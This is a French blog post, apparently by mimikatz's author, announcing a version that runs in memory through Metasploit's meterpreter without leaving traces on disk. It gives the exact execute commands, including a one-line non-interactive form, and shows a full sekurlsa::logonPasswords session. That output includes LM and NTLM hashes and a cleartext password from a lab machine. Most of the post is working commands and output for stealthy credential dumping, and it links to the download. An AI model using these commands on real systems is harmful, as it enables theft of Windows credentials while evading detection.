mimikatz @ meterpreter

Grâce à la patience de @mubix (http://www.room362.com/), j’ai pu passer quelques commandes à Metasploit, puis meterpreter… Ce n’était pas gagné pour ce shell mystérieux meterpreter >… je m’étais habitué à mimikatz #.

Cela m’a permis de constater que le dump des mots de passe, via l’exécution en mémoire, et par lecture, ne fonctionnait pas sous NT6 (une sombre histoire d’objet mal initialisé dans bcrypt).
J’ai donc recodé une partie de mes routines afin de ne plus faire d’appels à la fonction incriminée.

Cette nouvelle version s’exécute donc très bien en mémoire, via Meterpreter, sans laisser de traces sur le disque : execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe

meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe
Process 4020 created.
Channel 1 created.
mimikatz 1.0 x86 (RC)	/* Traitement du Kiwi (Sep  6 2012 04:02:46) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # sekurlsa::logonPasswords full

Authentification Id         : 0;473059
Package d'authentification  : NTLM
Utilisateur principal       : Gentil Kiwi
Domaine d'authentification  : vm-w7-ult
	msv1_0 : 	
	 * Utilisateur  : Gentil Kiwi
	 * Domaine      : vm-w7-ult
	 * Hash LM      : d0e9aee149655a6075e4540af1f22d3b
	 * Hash NTLM    : cc36cf7a8514893efccd332446158b1a
	kerberos : 	
	 * Utilisateur  : Gentil Kiwi
	 * Domaine      : vm-w7-ult
	 * Mot de passe : waza1234/
	wdigest : 	
	 * Utilisateur  : Gentil Kiwi
	 * Domaine      : vm-w7-ult
	 * Mot de passe : waza1234/
	tspkg : 	
	 * Utilisateur  : Gentil Kiwi
	 * Domaine      : vm-w7-ult
	 * Mot de passe : waza1234/

J’utilise ici mimikatz en mode interactif, mais il est tout à fait possible d’utiliser la ligne de commande pour passer la liste de fonctions à appeler : execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe -a '"sekurlsa::logonPasswords full" exit'

C’est d’ailleurs ce que fait @mubix : http://www.room362.com/blog/2012/09/05/completely-in-memory-mimikatz-with-metasploit/

La version prenant en charge cette amélioration est disponible : http://blog.gentilkiwi.com/mimikatz

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.